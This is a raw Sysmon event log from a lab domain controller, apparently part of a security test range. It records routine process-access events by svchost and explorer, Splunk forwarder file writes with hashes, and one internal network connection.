22:52:57.004{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694532Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.004{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001695105Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:58.648{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F642D9569D08E531996A0D9E6D401E5,SHA256=1B0F80A92B0FDFBD8C3F41033E499D9EDE8CD4F92A706FCC70F501AA6D12A9A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695104Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:58.067{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7FE08EFD7BF77354F951E6AA8701E14F,SHA256=53630536E30809C30878A8E0ABF81EA1CB10D8B1EF8994E29ECD166307B9BCA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695103Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:58.035{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0BF8212BAA655B05A215701E379C9BA8,SHA256=5DF6A93D75DC3020DA2F99FF4C6D93C39F472D96774F7D659618AF33E3D180D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695106Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:59.676{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE72B9AD92F2EE1F61AAA0696942A61F,SHA256=EB4A08B5DB875E8EE63E9D61BBB429F00F7F9D160F9DE608EB67EE2E7F23B4BA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001695219Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:52.471{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55109-false10.0.1.12-8000- 23542300x80000000000000001695218Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.749{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B7AE4C6C4BB5CDD214C2A594A83DDC1,SHA256=E4FD897C713A9E4E926D0A0F9A83C6F44754630C2C9639E8EAA9D9E9F25C8D49,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695217Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.598{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001695216Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.598{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\System32\SHELL32.dll+d18e0|C:\Windows\System32\SHELL32.dll+d180d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\explorerframe.dll+5bcb3|C:\Windows\system32\explorerframe.dll+1a47e|C:\Windows\system32\explorerframe.dll+19d02|C:\Windows\system32\explorerframe.dll+19cb2|C:\Windows\system32\explorerframe.dll+281b6|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695215Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.598{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\System32\SHELL32.dll+d18e0|C:\Windows\System32\SHELL32.dll+d180d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\explorerframe.dll+5bcb3|C:\Windows\system32\explorerframe.dll+1a47e|C:\Windows\system32\explorerframe.dll+19d02|C:\Windows\system32\explorerframe.dll+19cb2|C:\Windows\system32\explorerframe.dll+281b6|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695214Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.598{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\System32\SHELL32.dll+d18e0|C:\Windows\System32\SHELL32.dll+d180d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\explorerframe.dll+5bcb3|C:\Windows\system32\explorerframe.dll+1a47e|C:\Windows\system32\explorerframe.dll+19d02|C:\Windows\system32\explorerframe.dll+19cb2|C:\Windows\system32\explorerframe.dll+281b6|C:\Windows\System32\windows.storage.dll+13bc8f 10341000x80000000000000001695213Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.598{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\System32\SHELL32.dll+d18e0|C:\Windows\System32\SHELL32.dll+d180d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\explorerframe.dll+5bcb3|C:\Windows\system32\explorerframe.dll+1a47e|C:\Windows\system32\explorerframe.dll+19d02|C:\Windows\system32\explorerframe.dll+19cb2|C:\Windows\system32\explorerframe.dll+281b6|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b 23542300x80000000000000001695212Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.426{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1A34C8F58B9D0C4FDCFFC7BB6A87670,SHA256=A7C49B130609D6DCE1B8879FD5A66B14FDDAF4427C4F2083EE12E3DC7FF29C99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695211Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.410{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=460E4986A7A6316FE0A842351C91312A,SHA256=BF26A0156415732654399DAA8B4A651666D87F8D8A1C90F283545EFE041DE1C8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695210Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.395{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001695209Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.395{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001695208Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.395{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001695207Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.395{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001695206Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.395{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001695205Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.395{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001695204Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.379{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695203Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.379{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695202Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.379{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695201Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.379{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 